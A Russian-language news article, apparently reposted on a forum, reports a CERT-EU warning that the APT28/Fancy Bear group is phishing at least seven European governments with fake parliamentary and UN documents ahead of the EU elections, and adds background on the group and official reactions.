По меньшей мере семь европейских правительств подверглись целенаправленным фишинговым кампаниям, которые включают использование специально разработанных приманок для нацеливания на конкретные важные цели с целью загрузки вредоносного программного обеспечения или предоставления доступа к цифровым системам.

«Мы оцениваем, что уровень угрозы высок», — говорится в записке группы реагирования на кибер-чрезвычайные ситуации ЕС (CERT-EU), засекреченной для ограниченного распространения (TLP Amber+Strict), которую отправили в начале ноября.

Кто стоит за атаками
Fancy Bear, также известная как APT28, — это связанная с российской разведкой хакерская группа, которая, по утверждениям США, стояла за взломами Национального комитета Демократической партии в 2016 году, которые способствовали победе Дональда Трампа на выборах. В 2020 году группа также подверглась санкциям со стороны властей ЕС за взлом немецкого Бундестага в 2015 году.

Группа «использует различные фальшивые документы для заманивания жертв, в том числе протоколы заседаний подкомитета Европейского парламента и отчет Специального комитета ООН», говорится в записке.

Предупреждение прозвучало на фоне растущих опасений, что европейские выборы в следующем году станут мишенью хакерских группировок из стран с программой кибернаступления против Европы, таких как Россия и Китай. Избиратели ЕС отправятся на избирательные участки уже в июне.

8c91b8ebcd0259eb92d2997e95ae3fbc.png



Были ли еще атаки
Хакерские группы в течение многих лет преследовали европейские страны кибератаками, кибершпионажем и кампаниями по дезинформации, что страны ЕС считают попытками подорвать их внутреннюю политику и дипломатическую позицию.

В частности, Fancy Bear действует уже не менее 15 лет. По словам западных специалистов, она специализируется на проникновении в правительственные и критически важные отраслевые организации по всему Западу и использовании взломанной информации для подрыва политики.

Ответ на взломы
Представитель Европейской комиссии Йоханнес Барке отказался комментировать новое предупреждение, но заявил, что ведомство «осведомлено о растущем количестве вредоносных кибердействий в глобальном масштабе».

«Регулярный обмен информацией имеет первостепенное значение, чтобы позволить всем ключевым игрокам в ЕС быть в курсе возможных угроз и получать, где это возможно, новые идеи для оценки и смягчения киберрисков», — сказал он.

Европейский парламент отказался от комментариев. Совет ЕС не ответил на запрос о комментариях.

61b646c902aa90e99291c7ec6a457b4f.png
 
Сверху Снизу